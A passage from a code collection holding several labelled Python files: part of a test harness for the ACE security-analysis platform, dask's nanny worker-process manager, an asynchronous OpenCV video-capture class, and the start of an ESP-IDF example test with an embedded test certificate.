start=saq.SAQ_HOME),
company_name=company_name if company_name else None,
company_id=company_id if company_id else None,
analysis_mode=analysis_mode if analysis_mode else 'test_groups')
class ServerProcess(object):
def __init__(self, args):
self.args = args
self.process = None
self.stdout_reader = None
self.stderr_reader = None
def start(self):
self.process = Popen(self.args, stdout=PIPE, stderr=PIPE, universal_newlines=True)
logging.debug("started process for {} with pid {} args {}".format(
type(self), self.process.pid, ','.join(self.args)))
self.stdout_reader = threading.Thread(target=self.pipe_reader, args=(self.process.stderr, self.handle_stdout))
self.stdout_reader.daemon = True
self.stdout_reader.start()
self.stderr_reader = threading.Thread(target=self.pipe_reader, args=(self.process.stdout, self.handle_stderr))
self.stderr_reader.daemon = True
self.stderr_reader.start()
logging.debug("waiting for {} to start...".format(type(self)))
wait_for(self.startup_condition)
logging.debug("{} started".format(type(self)))
def stop(self):
if self.process is None:
return
logging.debug("stopping process {} with pid {}".format(type(self), self.process.pid))
self.process.terminate()
self.process.wait()
self.process = None
logging.debug("stopping process output readers...")
self.stdout_reader.join()
self.stdout_reader = None
self.stderr_reader.join()
self.stderr_reader = None
def handle_stdout(self, line):
#print("STDOUT {}\t{}".format(type(self), line.strip()))
pass
def handle_stderr(self, line):
if '[ERROR]' in line:
print("detected error in subprocess: {}".format(line.strip()))
#print("STDERR {}\t{}".format(type(self), line.strip()))
def pipe_reader(self, pipe, callback):
for line in pipe:
callback(line.strip())
def started(self):
"""Returns True if this process has actually started."""
return True
class EngineProcess(ServerProcess):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.engine_started = False
def startup_condition(self):
return self.engine_started
def handle_stderr(self, line):
if 'engine started' in line:
self.engine_started = True
ServerProcess.handle_stderr(self, line)
class GUIServer(ServerProcess):
def __init__(self):
super().__init__(['python3', 'saq', '-L', 'etc/console_debug_logging.ini', 'start-gui'])
self.saq_init = 0
def handle_stderr(self, line):
if 'SAQ initialized' in line:
self.saq_init += 1
ServerProcess.handle_stderr(self, line)
def startup_condition(self):
return self.saq_init > 1
class ACEBasicTestCase(TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.api_server_process = None
# a list of temporary test files we've created using self.create_test_file
self.tracked_test_files = []
def setUp(self):
#saq.DUMP_TRACEBACKS = True
self.starting_thread_count = threading.active_count()
logging.info("TEST: {}".format(self.id()))
self.save_signal_handlers()
initialize_test_environment()
self.reset()
import saq
saq.db.remove()
open_test_comms()
memory_log_handler.clear()
self.initialize_test_client()
def initialize_test_client(self):
from aceapi import create_app
self.app = create_app(testing=True)
self.app_context = self.app.test_request_context()
self.app_context.push()
self.client = self.app.test_client()
# Hopefully temporary hack to ensure session is cleared after each test
import aceapi
aceapi.db.session.close()
def tearDown(self):
close_test_comms()
# anything logged at CRITICAL log level will cause the test the fail
#self.assertFalse(memory_log_handler.search(lambda e: e.levelno == logging.CRITICAL))
import saq
saq.DUMP_TRACEBACKS = False
self.stop_api_server()
if saq.engine.CURRENT_ENGINE is not None:
try:
saq.engine.CURRENT_ENGINE.stop()
except:
pass
for file_path in self.tracked_test_files:
if os.path.exists(file_path):
os.remove(file_path)
# clear the database session this test used
saq.db.remove()
self.restore_signal_handlers()
# clear all the registered services
import saq.service
saq.service._registered_services = []
thread_count_difference = threading.active_count() - self.starting_thread_count
if thread_count_difference != 0:
logging.warning(f"thread count difference after {self.id()} is {thread_count_difference}")
def create_test_file(self, file_path='.unittest_test_data', file_content=None, root_analysis=None):
"""Creates a test file and returns the path to the newly created file.
Any file created this way is automatically deleted after the test runs.
If file_path is relative then the file is created relative to SAQ_HOME.
If root_analysis is a RootAnalysis object then file_path is crated relative to the storage_dir of this analysis.
If file_content is not None then it is used as the content of the file.
Otherwise, 1024 random bytes are used."""
if not os.path.isabs(file_path):
if root_analysis:
target_file_path = os.path.join(root_analysis.storage_dir, file_path)
else:
target_file_path = abs_path(file_path)
mode = 'wb'
if isinstance(file_content, str):
mode = 'w'
with open(target_file_path, mode) as fp:
if file_content:
fp.write(file_content)
else:
fp.write(secrets.token_bytes(1024))
self.tracked_test_files.append(target_file_path)
return file_path
def clear_error_reports(self):
"""Clears out any error reports generated by the test."""
try:
shutil.rmtree(os.path.join(saq.DATA_DIR, 'error_reports'))
os.makedirs(os.path.join(saq.DATA_DIR, 'error_reports'))
except Exception as e:
sys.stderr.write("unable to clear error_reports: {}\n".format(e))
def wait_for_log_entry(self, *args, **kwargs):
try:
return wait_for_log_entry(*args, **kwargs)
except WaitTimedOutError:
return False
def wait_for_condition(self, condition, timeout=5, delay=1):
"""Waits for condition to return True.
condition is checked every delay seconds until it return True or timeout seconds have elapsed."""
time_limit = datetime.datetime.now() + datetime.timedelta(seconds=timeout)
while True:
if condition():
return True
if datetime.datetime.now() > time_limit:
raise WaitTimedOutError()
time.sleep(delay)
def reset(self):
"""Resets everything back to the default state."""
self.reset_config()
self.reset_brocess()
self.reset_cloudphish()
self.reset_correlation()
self.reset_email_archive()
self.reset_crawlphish()
self.reset_log_exports()
self.reset_var_dir()
self.clear_error_reports()
# re-enable encryption in case we disabled it
#saq.ENCRYPTION_PASSWORD = get_aes_key('password')
def reset_var_dir(self):
# clears out the var directory
shutil.rmtree(os.path.join(saq.DATA_DIR, 'var'))
os.mkdir(os.path.join(saq.DATA_DIR, 'var'))
os.mkdir(os.path.join(saq.DATA_DIR, 'var', 'tmp'))
os.mkdir(os.path.join(saq.DATA_DIR, 'var', 'daemon'))
os.mkdir(os.path.join(saq.DATA_DIR, 'var', 'services'))
def reset_log_exports(self):
# reset splunk export logs
splunk_log_dir = os.path.join(saq.DATA_DIR, saq.CONFIG['splunk_logging']['splunk_log_dir'])
if os.path.isdir(splunk_log_dir):
shutil.rmtree(splunk_log_dir)
os.mkdir(splunk_log_dir)
# reset es export logs
es_log_dir = os.path.join(saq.DATA_DIR, saq.CONFIG['elk_logging']['elk_log_dir'])
if os.path.isdir(es_log_dir):
shutil.rmtree(es_log_dir)
os.mkdir(es_log_dir)
def reset_crawlphish(self):
self.whitelist_path = saq.CONFIG['analysis_module_crawlphish']['whitelist_path'] \
= os.path.join('etc', 'crawlphish.unittest.whitelist')
self.regex_path = saq.CONFIG['analysis_module_crawlphish']['regex_path'] \
= os.path.join('etc', 'crawlphish.unittest.regex')
self.blacklist_path = saq.CONFIG['analysis_module_crawlphish']['blacklist_path'] \
= os.path.join('etc', 'crawlphish.unittest.blacklist')
if os.path.exists(self.whitelist_path):
os.remove(self.whitelist_path)
if os.path.exists(self.regex_path):
os.remove(self.regex_path)
if os.path.exists(self.blacklist_path):
os.remove(self.blacklist_path)
with open(self.blacklist_path, 'w') as fp:
fp.write('10.0.0.0/8\n')
fp.write('127.0.0.1\n')
fp.write('localhost.local\n')
with open(self.regex_path, 'w') as fp:
fp.write('\.(pdf|zip|scr|js|cmd|bat|ps1|doc|docx|xls|xlsx|ppt|pptx|exe|vbs|vbe|jse|wsh|cpl|rar|ace|hta)$\n')
with open(self.whitelist_path, 'w') as fp:
fp.write('anonfile.xyz\n')
def reset_config(self):
"""Resets saq.CONFIG."""
saq.load_configuration()
@use_db(name='hal9000')
def reset_hal9000(self, db, c):
c.execute("DELETE FROM observables")
db.commit()
@use_db(name='brocess')
def reset_brocess(self, db, c):
# clear the brocess db
c.execute("""DELETE FROM httplog""")
c.execute("""DELETE FROM smtplog""")
db.commit()
# TODO instead of using harded values pull the limits from the config
c.execute("""INSERT INTO httplog ( host, numconnections, firstconnectdate )
VALUES ( 'local', 1000, UNIX_TIMESTAMP(NOW()) ),
( 'xyz', 1000, UNIX_TIMESTAMP(NOW()) ),
( 'test1.local', 70, UNIX_TIMESTAMP(NOW()) ),
( 'test2.local', 69, UNIX_TIMESTAMP(NOW()) )""")
db.commit()
@use_db
def reset_cloudphish(self, db, c):
# clear cloudphish db
c.execute("""DELETE FROM cloudphish_analysis_results""")
c.execute("""DELETE FROM cloudphish_content_metadata""")
db.commit()
# clear cloudphish engine and module cache
for cache_dir in [ saq.CONFIG['cloudphish']['cache_dir'] ]:
if os.path.isdir(cache_dir):
shutil.rmtree(cache_dir)
os.makedirs(cache_dir)
@use_db
def reset_correlation(self, db, c):
global UNITTEST_USER_ID
import saq
data_subdir = os.path.join(saq.CONFIG['global']['data_dir'], saq.SAQ_NODE)
failed_alert_subdir = os.path.join(saq.SAQ_HOME, '.saq_alerts')
subdirs = [ data_subdir, failed_alert_subdir ]
if saq.CONFIG['service_engine']['work_dir']:
subdirs.append(saq.CONFIG['service_engine']['work_dir'])
for subdir in subdirs:
if os.path.isdir(subdir):
try:
shutil.rmtree(subdir)
os.mkdir(subdir)
except Exception as e:
logging.error(f"unable to clear {subdir}: {e}")
c.execute("DELETE FROM alerts")
c.execute("DELETE FROM workload")
c.execute("DELETE FROM observables")
c.execute("DELETE FROM tags")
c.execute("INSERT INTO tags ( `id`, `name` ) VALUES ( 1, 'whitelisted' )")
c.execute("DELETE FROM events")
c.execute("DELETE FROM remediation")
c.execute("DELETE FROM messages")
c.execute("DELETE FROM company WHERE name != 'default'")
c.execute("DELETE FROM nodes WHERE is_local = 1")
c.execute("UPDATE nodes SET is_primary = 0")
c.execute("DELETE FROM locks")
c.execute("DELETE FROM delayed_analysis")
c.execute("DELETE FROM users")
c.execute("DELETE FROM malware")
from app.models import User
u = User()
u.username = 'unittest'
u.email = 'unittest@localhost'
u.password = 'unittest'
c.execute("""
INSERT INTO users ( username, email, password_hash ) VALUES ( %s, %s, %s )""",
(u.username, u.email, u.password_hash))
UNITTEST_USER_ID = c.lastrowid
logging.debug(f"got user id {UNITTEST_USER_ID} for unittest user")
db.commit()
import saq.database
saq.database.initialize_automation_user()
def reset_email_archive(self):
import socket
archive_subdir = os.path.join(saq.DATA_DIR, saq.CONFIG['analysis_module_email_archiver']['archive_dir'],
socket.gethostname().lower())
if os.path.exists(archive_subdir):
try:
shutil.rmtree(archive_subdir)
os.mkdir(archive_subdir)
except Exception as e:
logging.error("unable to clear {}: {}".format(archive_subdir, e))
with get_db_connection('email_archive') as db:
c = db.cursor()
c.execute("DELETE FROM archive")
db.commit()
def start_api_server(self, remote_host=None, ssl_verification=None, listen_address=None, listen_port=None, ssl_cert=None, ssl_key=None):
"""Starts the API server as a separate process."""
self.api_server_process = Process(target=self.execute_api_server, args=(listen_address, listen_port, ssl_cert, ssl_key))
self.api_server_process.start()
if remote_host is None:
remote_host = saq.API_PREFIX
if ssl_verification is None:
ssl_verification = saq.CONFIG['SSL']['ca_chain_path']
import ace_api
result = None
errors = []
for x in range(5):
try:
result = ace_api.ping(remote_host=remote_host, ssl_verification=ssl_verification)
break
except Exception as e:
errors.append(str(e))
time.sleep(1)
if result is None:
for error in errors:
logging.error(error)
self.fail("unable to start api server")
def execute_api_server(self, listen_address=None, listen_port=None, ssl_cert=None, ssl_key=None):
# https://gist.github.com/rduplain/1705072
# this is a bit weird because I want the urls to be the same as they
# are configured for apache, where they are all starting with /api
import aceapi
from saq.database import initialize_database
app = aceapi.create_app(testing=True)
from werkzeug.serving import run_simple
from werkzeug.wsgi import DispatcherMiddleware
from flask import Flask
app.config['DEBUG'] = True
app.config['APPLICATION_ROOT'] = '/api'
application = DispatcherMiddleware(Flask('dummy_app'), {
app.config['APPLICATION_ROOT']: app,
})
if listen_address is None:
listen_address = saq.CONFIG.get('api', 'listen_address')
if listen_port is None:
listen_port = saq.CONFIG.getint('api', 'listen_port')
ssl_context = (
saq.CONFIG.get('api', 'ssl_cert') if ssl_cert is None else ssl_cert,
saq.CONFIG.get('api', 'ssl_key') if ssl_key is None else ssl_key )
initialize_database()
saq.db = aceapi.db.session
logging.info(f"starting api server on {listen_address} port {listen_port}")
run_simple(listen_address, listen_port, application, ssl_context=ssl_context, use_reloader=False)
def stop_api_server(self):
"""Stops the API server if it's running."""
if self.api_server_process is None:
return
import signal
os.kill(self.api_server_process.pid, signal.SIGKILL)
self.api_server_process.join()
self.api_server_process = None
def save_signal_handlers(self):
self.sigterm_handler = signal.getsignal(signal.SIGTERM)
self.sigint_handler = signal.getsignal(signal.SIGINT)
self.sighup_handler = signal.getsignal(signal.SIGHUP)
def restore_signal_handlers(self):
signal.signal(signal.SIGTERM, self.sigterm_handler)
signal.signal(signal.SIGINT, self.sigint_handler)
signal.signal(signal.SIGHUP, self.sighup_handler)
class ACEEngineTestCase(ACEBasicTestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# if we create an engine using self.create_engine() then we track it here
self.tracked_engine = None
self.server_processes = {} # key = name, value ServerProcess
def start_gui_server(self):
self.server_processes['gui'] = GUIServer()
self.server_processes['gui'].start()
def start_cloudphish_server(self):
self.server_processes['cloudphish'] = CloudphishServer()
self.server_processes['cloudphish'].start()
def stop_tracked_engine(self):
if self.tracked_engine:
try:
self.tracked_engine.stop()
self.wait_engine(self.tracked_engine)
except Exception as e:
logging.error("unable to stop tracked engine {}: {}".format(self.tracked_engine, e))
report_exception()
finally:
self.tracked_engine = None
def setUp(self, *args, **kwargs):
super().setUp(*args, **kwargs)
self.disable_all_modules()
def tearDown(self):
ACEBasicTestCase.tearDown(self)
self.stop_tracked_engine()
for key in self.server_processes.keys():
self.server_processes[key].stop()
#if saq.engine.CURRENT_ENGINE:
#try:
#saq.engine.CURRENT_ENGINE.stop()
#except:
#pass
def execute_engine_test(self, engine):
try:
engine.start()
engine.wait()
except KeyboardInterrupt:
engine.stop()
engine.wait()
def create_engine(self, cls, *args, **kwargs):
try:
self.tracked_engine = cls(*args, **kwargs)
return self.tracked_engine
except Exception as e:
logging.error("unable to create engine {}: {}".format(cls, e))
report_exception()
self.fail("unable to create engine {}: {}".format(cls, e))
def start_engine(self, engine):
try:
engine.start()
except Exception as e:
engine.stop()
engine.wait()
self.fail("engine failure: {}".format(e))
def wait_engine(self, engine):
try:
engine.wait()
except Exception as e:
engine.controlled_stop()
engine.wait()
self.fail("engine failure: {}".format(e))
def kill_engine(self, engine):
try:
engine.stop()
engine.wait()
except Exception as e:
self.fail("engine failure: {}".format(e))
def disable_all_modules(self):
"""Disables all the modules specified in the configuration file. Requires a @reset_config."""
for key in saq.CONFIG.keys():
if key.startswith('analysis_module_'):
saq.CONFIG[key]['enabled'] = 'no'
#if key.startswith('analysis_mode_'):
#delete_list = []
#for value in saq.CONFIG[key].keys():
#if value.startswith('analysis_module_'):
#delete_list.append(value)
#for analysis_module in delete_list:
#logging.debug(f"deleting {analysis_module} from {key}")
#del saq.CONFIG[key][analysis_module]
#saq.CONFIG[key]['module_groups'] = ''
logging.debug("disabled all modules")
class CloudphishServer(EngineProcess):
def __init__(self):
super().__init__(['python3', 'saq', '-L', 'etc/console_debug_logging.ini', '--start', 'cloudphish'])
class ACEModuleTestCase(ACEEngineTestCase):
pass
class TestEngine(Engine):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.disable_alerting()
def set_cleanup(self, mode, value):
saq.CONFIG[f'analysis_mode_{mode}']['cleanup'] = 'yes' if value else 'no'
logging.debug(f"set cleanup to {value} for analysis mode {mode}")
|
nanny.py
|
from __future__ import print_function, division, absolute_import
from datetime import timedelta
import logging
from multiprocessing.queues import Empty
import os
import psutil
import shutil
import threading
import uuid
import dask
from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError
from tornado.locks import Event
from .comm import get_address_host, get_local_address_for, unparse_host_port
from .core import rpc, RPCClosed, CommClosedError, coerce_to_address
from .metrics import time
from .node import ServerNode
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (get_ip, mp_context, silence_logging, json_load_robust,
PeriodicCallback)
from .worker import _ncores, run, parse_memory_limit, Worker
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
""" A process to manage worker processes
The nanny spins up Worker processes, watches then, and kills or restarts
them as necessary.
"""
process = None
status = None
def __init__(self, scheduler_ip=None, scheduler_port=None,
scheduler_file=None, worker_port=0, ncores=None, loop=None,
local_dir='dask-worker-space', services=None, name=None,
memory_limit='auto', reconnect=True, validate=False, quiet=False,
resources=None, silence_logs=None, death_timeout=None, preload=(),
preload_argv=[], security=None, contact_address=None,
listen_address=None, worker_class=None, env=None, **kwargs):
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg['address']
elif scheduler_ip is None and dask.config.get('scheduler-address'):
self.scheduler_addr = dask.config.get('scheduler-address')
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
self._given_worker_port = worker_port
self.ncores = ncores or _ncores
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = death_timeout
self.preload = preload
self.preload_argv = preload_argv
self.Worker = Worker if worker_class is None else worker_class
self.env = env or {}
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get('distributed.worker.memory.terminate')
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args('worker')
self.listen_args = self.security.get_listen_args('worker')
self.local_dir = local_dir
self.loop = loop or IOLoop.current()
self.scheduler = rpc(self.scheduler_addr, connection_args=self.connection_args)
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.ncores)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {'instantiate': self.instantiate,
'kill': self.kill,
'restart': self.restart,
# cannot call it 'close' on the rpc side for naming conflict
'terminate': self._close,
'run': self.run}
super(Nanny, self).__init__(handlers, io_loop=self.loop,
connection_args=self.connection_args,
**kwargs)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100, io_loop=self.loop)
self.periodic_callbacks['memory'] = pc
self._listen_address = listen_address
self.status = 'init'
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.ncores)
@gen.coroutine
def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (gen.TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
try:
yield gen.with_timeout(timedelta(seconds=timeout),
self.scheduler.unregister(address=self.worker_address),
quiet_exceptions=allowed_errors)
except allowed_errors:
pass
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@gen.coroutine
def _start(self, addr_or_port=0):
""" Start nanny, start local process, start watching """
# XXX Factor this out
if not addr_or_port:
# Default address is the required one to reach the scheduler
self.listen(get_local_address_for(self.scheduler.address),
listen_args=self.listen_args)
self.ip = get_address_host(self.address)
elif isinstance(addr_or_port, int):
# addr_or_port is an integer => assume TCP
self.ip = get_ip(
get_address_host(self.scheduler.address)
)
self.listen((self.ip, addr_or_port),
listen_args=self.listen_args)
else:
self.listen(addr_or_port, listen_args=self.listen_args)
self.ip = get_address_host(self.address)
logger.info(' Start Nanny at: %r', self.address)
response = yield self.instantiate()
if response == 'running':
assert self.worker_address
self.status = 'running'
else:
yield self._close()
self.start_periodic_callbacks()
def start(self, addr_or_port=0):
self.loop.add_callback(self._start, addr_or_port)
@gen.coroutine
def kill(self, comm=None, timeout=2):
""" Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
raise gen.Return('OK')
deadline = self.loop.time() + timeout
yield self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
yield self._unregister(deadline - self.loop.time())
@gen.coroutine
def instantiate(self, comm=None):
""" Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(host,
self._given_worker_port)
if self.process is None:
self.process = WorkerProcess(
worker_args=(self.scheduler_addr,),
worker_kwargs=dict(ncores=self.ncores,
local_dir=self.local_dir,
services=self.services,
service_ports={'nanny': self.port},
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address),
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit,
worker=self.Worker,
env=self.env,
)
self.auto_restart = True
if self.death_timeout:
try:
result = yield gen.with_timeout(
timedelta(seconds=self.death_timeout),
self.process.start()
)
except gen.TimeoutError:
yield self._close(timeout=self.death_timeout)
raise gen.Return('timed out')
else:
result = yield self.process.start()
raise gen.Return(result)
@gen.coroutine
def restart(self, comm=None, timeout=2, executor_wait=True):
start = time()
@gen.coroutine
def _():
if self.process is not None:
yield self.kill()
yield self.instantiate()
try:
yield gen.with_timeout(timedelta(seconds=timeout), _())
except gen.TimeoutError:
logger.error("Restart timed out, returning before finished")
raise gen.Return('timed out')
else:
raise gen.Return('OK')
def memory_monitor(self):
""" Track worker's memory. Restart if it goes above terminate fraction """
if self.status != 'running':
return
process = self.process.process
if process is None:
return
try:
proc = psutil.Process(process.pid)
except psutil.NoSuchProcess:
return
memory = proc.memory_info().rss
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning("Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.status == 'running'
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
@gen.coroutine
def _on_exit(self, exitcode):
if self.status not in ('closing', 'closed'):
try:
yield self.scheduler.unregister(address=self.worker_address)
except (EnvironmentError, CommClosedError):
if not self.reconnect:
yield self._close()
return
try:
if self.status not in ('closing', 'closed'):
if self.auto_restart:
logger.warning("Restarting worker")
yield self.instantiate()
except Exception:
logger.error("Failed to restart worker after its process exited",
exc_info=True)
@property
def pid(self):
return self.process and self.process.pid
@gen.coroutine
def _close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status in ('closing', 'closed'):
raise gen.Return('OK')
self.status = 'closing'
logger.info("Closing Nanny at %r", self.address)
self.stop()
try:
if self.process is not None:
yield self.kill(timeout=timeout)
except Exception:
pass
self.process = None
self.rpc.close()
self.scheduler.close_rpc()
self.status = 'closed'
raise gen.Return('OK')
class WorkerProcess(object):
def __init__(self, worker_args, worker_kwargs, worker_start_args,
silence_logs, on_exit, worker, env):
self.status = 'init'
self.silence_logs = silence_logs
self.worker_args = worker_args
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
self.env = env
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
@gen.coroutine
def start(self):
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == 'running':
raise gen.Return(self.status)
if self.status == 'starting':
yield self.running.wait()
raise gen.Return(self.status)
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
kwargs=dict(worker_args=self.worker_args,
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid,
Worker=self.Worker,
env=self.env),
)
self.process.daemon = True
self.process.set_exit_callback(self._on_exit)
self.running = Event()
self.stopped = Event()
self.status = 'starting'
yield self.process.start()
msg = yield self._wait_until_connected(uid)
if not msg:
raise gen.Return(self.status)
self.worker_address = msg['address']
self.worker_dir = msg['dir']
assert self.worker_address
self.status = 'running'
self.running.set()
init_q.close()
raise gen.Return(self.status)
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode,)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode,)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return (self.process.pid
if self.process and self.process.is_alive()
else None)
def mark_stopped(self):
if self.status != 'stopped':
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.warning(msg)
self.status = 'stopped'
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
@gen.coroutine
def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == 'stopped':
return
if self.status == 'stopping':
yield self.stopped.wait()
return
assert self.status in ('starting', 'running')
self.status = 'stopping'
process = self.process
self.child_stop_q.put({
'op': 'stop',
'timeout': max(0, deadline - loop.time()) * 0.8,
'executor_wait': executor_wait,
})
self.child_stop_q.close()
while process.is_alive() and loop.time() < deadline:
yield gen.sleep(0.05)
if process.is_alive():
logger.warning("Worker process still alive after %d seconds, killing",
timeout)
try:
yield process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
@gen.coroutine
def _wait_until_connected(self, uid):
delay = 0.05
while True:
if self.status != 'starting':
return
try:
msg = self.init_result_q.get_nowait()
except Empty:
yield gen.sleep(delay)
continue
if msg['uid'] != uid: # ensure that we didn't cross queues
continue
if 'exception' in msg:
logger.error("Failed while trying to start worker process: %s",
msg['exception'])
yield self.process.join()
raise msg
else:
raise gen.Return(msg)
@classmethod
def _run(cls, worker_args, worker_kwargs, worker_start_args,
silence_logs, init_result_q, child_stop_q, uid, env, Worker): # pragma: no cover
os.environ.update(env)
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(*worker_args, **worker_kwargs)
@gen.coroutine
def do_stop(timeout=5, executor_wait=True):
try:
yield worker._close(report=False,
nanny=False,
executor_wait=executor_wait,
timeout=timeout)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop('op') == 'stop'
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
@gen.coroutine
def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
yield worker._start(*worker_start_args)
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({'uid': uid, 'exception': e})
init_result_q.close()
else:
assert worker.address
init_result_q.put({'address': worker.address,
'dir': worker.local_dir,
'uid': uid})
init_result_q.close()
yield worker.wait_until_closed()
logger.info("Worker closed")
try:
loop.run_sync(run)
except TimeoutError:
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
pass
|
videocaptureasync.py
|
import threading
import cv2
from time import sleep
import copy
class VideoCaptureAsync:
def __init__(self, width=2688, height=1520, thermal=True):
self.src = 0
self.cap = cv2.VideoCapture(self.src)
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.grabbed, self.frame = self.cap.read()
self.started = False
self.read_lock = threading.Lock()
def set(self, var1, var2):
self.cap.set(var1, var2)
def start(self):
if self.started:
print('[!] Asynchroneous video capturing has already been started.')
return None
self.started = True
self.thread = threading.Thread(target=self.update, args=())
self.thread.start()
return self
def update(self):
while self.started:
sleep(0.03)
grabbed, frame = self.cap.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
return grabbed, frame
def isOpened(self):
return self.cap.isOpened()
def stop(self):
self.started = False
self.thread.join()
def release(self):
self.cap.release()
def __exit__(self, exec_type, exc_value, traceback):
self.cap.release()
|
example_test.py
|
import re
import os
import socket
import BaseHTTPServer
import SimpleHTTPServer
from threading import Thread
import ssl
from tiny_test_fw import DUT
import ttfw_idf
server_cert = "-----BEGIN CERTIFICATE-----\n" \
"MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n"\
"BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n"\
"aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n"\
"MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n"\
"ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n"\
"CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n"\
"nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n"\
"9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n"\
"w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n"\
"3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n"\
"lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n"\
